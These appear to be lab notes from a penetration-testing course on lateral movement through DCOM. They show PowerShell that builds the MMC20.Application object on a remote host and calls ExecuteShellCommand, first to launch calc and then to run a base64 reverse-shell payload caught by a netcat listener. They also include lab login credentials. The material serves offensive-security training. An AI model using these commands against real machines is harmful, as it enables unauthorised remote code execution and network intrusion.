Topics: DCOM
# Question 1
Start VM Group 1 and repeat the steps discussed in this section. Which MMC method accepts command shell arguments?
# Answer
ExecuteShellCommand

# The Microsoft Component Object Model (COM) is a system for creating software components that interact with each other. While COM was created for either same-process or cross-process interaction, it was extended to Distributed Component Object Model (DCOM) for interaction between multiple computers over a network.

# Both COM and DCOM are very old technologies dating back to the very first editions of Windows. Interaction with DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.

# The discovered DCOM lateral movement technique is based on the Microsoft Management Console (MMC) COM application that is employed for scripted automation of Windows systems.

# The MMC Application Class allows the creation of Application Objects, which expose the ExecuteShellCommand method under the Document.ActiveView property. As its name suggests, this method allows the execution of any shell command as long as the authenticated user is authorized, which is the default for local administrators.

xfreerdp /cert-ignore /u:jen /p:Nexus123! /d:corp.com /v:192.168.175.74

```
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.175.73"))
```

# Once the application object is saved into the $dcom variable, we can pass the required argument to the application via the ExecuteShellCommand method. The method accepts four parameters: Command, Directory, Parameters, and WindowState. We're only interested in the first and third parameters, which will be populated with cmd and /c calc, respectively.

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

# Once we execute these two PowerShell lines from CLIENT74, we should have spawned an instance of the calculator app.
# We can verify the calculator app is running with tasklist and filtering out the output with findstr.

C:\Users\Administrator>tasklist | findstr "calc"

# We can now improve our craft by extending this attack to a full reverse shell similar to what we did in the WMI and WinRM section earlier in this Module.

# Having generated the base64 encoded reverse shell with our Python script, we can replace our DCOM payload with it.

```
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"pwsh-revsh-encode.py code","7")
```

nc -lvnp 443
PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> hostname
FILES04

